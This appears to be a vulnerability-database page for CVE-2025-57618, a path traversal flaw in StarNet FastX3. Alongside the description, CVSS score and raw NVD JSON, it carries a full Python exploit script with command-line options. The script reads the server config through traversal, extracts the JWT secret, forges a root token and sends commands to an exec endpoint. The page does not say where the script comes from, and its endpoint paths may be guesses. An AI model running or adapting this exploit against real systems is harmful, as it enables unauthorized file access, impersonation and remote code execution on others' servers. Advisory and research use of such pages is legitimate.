Security Vulnerability Report
中文
CVE-2025-57618 CVSS 7.3 HIGH

CVE-2025-57618

Published: 2025-10-14 18:15:36
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A path traversal vulnerability in FastX3 thru 3.3.67 allows an unauthenticated attacker to read arbitrary files on the server. By leveraging this vulnerability, it is possible to access the application's configuration files, which contain the secret key used to sign JSON Web Tokens as well as existing JTIs. With this information, an attacker can forge valid JWTs, impersonate the root user, and achieve remote code execution in privileged context via authenticated endpoints.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

StarNet FastX3 <= 3.3.67

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57618 - FastX3 Path Traversal to RCE Exploit # Exploit chain: Path Traversal -> JWT Secret Disclosure -> JWT Forgery -> RCE import requests import jwt import json import argparse from datetime import datetime, timedelta TARGET_URL = "https://target-fastx3-server" CONFIG_FILE_PATH = "../../../../etc/starnet/fastx3/config.json" # Path traversal payload def exploit_path_traversal(target_url, file_path): """Step 1: Exploit path traversal to read arbitrary files""" # Craft path traversal URL to read JWT configuration url = f"{target_url}/download?file={file_path}" print(f"[*] Attempting path traversal: {url}") response = requests.get(url, verify=False) if response.status_code == 200: print(f"[+] File content retrieved successfully") return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None def extract_jwt_secret(config_content): """Step 2: Extract JWT signing secret from configuration""" try: config = json.loads(config_content) secret_key = config.get("jwt_secret", "") jti_list = config.get("jti_list", []) print(f"[+] JWT Secret: {secret_key}") print(f"[+] JTI List: {jti_list}") return secret_key, jti_list except json.JSONDecodeError: print("[-] Failed to parse config file") return None, None def forge_jwt_token(secret_key, username="root"): """Step 3: Forge a valid JWT token impersonating root user""" payload = { "sub": username, "name": username, "iat": datetime.utcnow(), "exp": datetime.utcnow() + timedelta(hours=24), "jti": "forged-jti-token-001" } # Sign JWT with the leaked secret key token = jwt.encode(payload, secret_key, algorithm="HS256") print(f"[+] Forged JWT token: {token}") return token def execute_rce(target_url, token, command): """Step 4: Use forged JWT to execute commands via privileged endpoint""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } payload = { "command": command, "args": "" } # Use authenticated privileged endpoint for RCE url = f"{target_url}/api/v1/exec" print(f"[*] Sending RCE payload to: {url}") response = requests.post(url, headers=headers, json=payload, verify=False) if response.status_code == 200: print(f"[+] RCE successful! Output: {response.text}") return response.text else: print(f"[-] RCE failed with status: {response.status_code}") return None def main(): parser = argparse.ArgumentParser(description="CVE-2025-57618 FastX3 Exploit") parser.add_argument("--target", required=True, help="Target FastX3 server URL") parser.add_argument("--command", default="id", help="Command to execute") args = parser.parse_args() # Step 1: Path traversal to read config config_content = exploit_path_traversal(args.target, CONFIG_FILE_PATH) if not config_content: return # Step 2: Extract JWT secret secret_key, jti_list = extract_jwt_secret(config_content) if not secret_key: return # Step 3: Forge JWT token forged_token = forge_jwt_token(secret_key) # Step 4: Execute RCE execute_rce(args.target, forged_token, args.command) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57618", "sourceIdentifier": "[email protected]", "published": "2025-10-14T18:15:36.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability in FastX3 thru 3.3.67 allows an unauthenticated attacker to read arbitrary files on the server. By leveraging this vulnerability, it is possible to access the application's configuration files, which contain the secret key used to sign JSON Web Tokens as well as existing JTIs. With this information, an attacker can forge valid JWTs, impersonate the root user, and achieve remote code execution in privileged context via authenticated endpoints."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "references": [{"url": "https://gitlab.com/daniele_m/cve-list/-/blob/main/README.md?ref_type=heads", "source": "[email protected]"}, {"url": "https://www.starnet.com/fastx/", "source": "[email protected]"}, {"url": "https://www.starnet.com/help/fastx3-3-server-release-notes/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.